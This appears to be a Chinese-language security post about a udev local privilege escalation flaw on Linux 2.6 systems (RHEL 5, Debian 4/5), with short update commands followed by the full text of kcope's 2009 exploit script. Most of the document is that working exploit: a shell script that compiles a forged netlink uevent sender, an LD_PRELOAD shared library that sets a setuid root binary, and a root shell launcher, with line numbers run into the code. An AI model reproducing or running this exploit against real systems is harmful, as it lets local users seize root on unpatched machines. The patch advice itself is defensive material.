Linux本地提权漏洞,对 RHEL 5.X x86和x64 和 Debian 4.x 5.x x86和x64很有效,速度更新udev吧
Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响) 修复方法(修复前请备份重要数据):
debian用户请执行apt-get update ; apt-get upgrade -y
centos用户请执行yum update udev
RedHat用户请使用官方rpm包更新或者购买RedHat的satellite服务。
Linux本地提权漏洞Linux Kernel 2.6 UDEV Local Privilege Escalation Exploit:
1#!/bin/sh2# Linux 2.63# bug found by Sebastian Krahmer4#5# lame sploit using LD technique6# by kcope in 20097# tested on debian-etch,ubuntu,gentoo8# do a 'cat /proc/net/netlink'9# and set the first arg to this10# script to the pid of the netlink socket11# (the pid is udevd_pid - 1 most of the time)12# + sploit has to be UNIX formatted text :)13# + if it doesn't work the 1st time try more often14#15# WARNING: maybe needs some FIXUP to work flawlessly116 collapsed lines
16## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang17
18cat > udev.c << _EOF19#include <fcntl.h>20#include <stdio.h>21#include <string.h>22#include <stdlib.h>23#include <unistd.h>24#include <dirent.h>25#include <sys/stat.h>26#include <sysexits.h>27#include <wait.h>28#include <signal.h>29#include <sys/socket.h>30#include <linux/types.h>31#include <linux/netlink.h>32
33#ifndef NETLINK_KOBJECT_UEVENT34#define NETLINK_KOBJECT_UEVENT 1535#endif36
37#define SHORT_STRING 6438#define MEDIUM_STRING 12839#define BIG_STRING 25640#define LONG_STRING 102441#define EXTRALONG_STRING 409642#define TRUE 143#define FALSE 044
45int socket_fd;46struct sockaddr_nl address;47struct msghdr msg;48struct iovec iovector;49int sz = 64*1024;50
51main(int argc, char **argv) {52 char sysfspath[SHORT_STRING];53 char subsystem[SHORT_STRING];54 char event[SHORT_STRING];55 char major[SHORT_STRING];56 char minor[SHORT_STRING];57
58 sprintf(event, "add");59 sprintf(subsystem, "block");60 sprintf(sysfspath, "/dev/foo");61 sprintf(major, "8");62 sprintf(minor, "1");63
64 memset(&address, 0, sizeof(address));65 address.nl_family = AF_NETLINK;66 address.nl_pid = atoi(argv[1]);67 address.nl_groups = 0;68
69 msg.msg_name = (void*)&address;70 msg.msg_namelen = sizeof(address);71 msg.msg_iov = &iovector;72 msg.msg_iovlen = 1;73
74 socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);75 bind(socket_fd, (struct sockaddr *) &address, sizeof(address));76
77 char message[LONG_STRING];78 char *mp;79
80 mp = message;81 mp += sprintf(mp, "%s@%s", event, sysfspath) +1;82 mp += sprintf(mp, "ACTION=%s", event) +1;83 mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;84 mp += sprintf(mp, "MAJOR=%s", major) +1;85 mp += sprintf(mp, "MINOR=%s", minor) +1;86 mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;87 mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;88
89 iovector.iov_base = (void*)message;90 iovector.iov_len = (int)(mp-message);91
92 char *buf;93 int buflen;94 buf = (char *) &msg;95 buflen = (int)(mp-message);96
97 sendmsg(socket_fd, &msg, 0);98
99 close(socket_fd);100
101 sleep(10);102 execl("/tmp/suid", "suid", (void*)0);103}104
105_EOF106gcc udev.c -o /tmp/udev107cat > program.c << _EOF108#include <unistd.h>109#include <stdio.h>110#include <sys/types.h>111#include <stdlib.h>112
113void _init()114{115 setgid(0);116 setuid(0);117 unsetenv("LD_PRELOAD");118 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);119}120
121_EOF122gcc -o program.o -c program.c -fPIC123gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles124cat > suid.c << _EOF125int main(void) {126 setgid(0); setuid(0);127 execl("/bin/sh","sh",0); }128_EOF129gcc -o /tmp/suid suid.c130cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0131/tmp/udev $1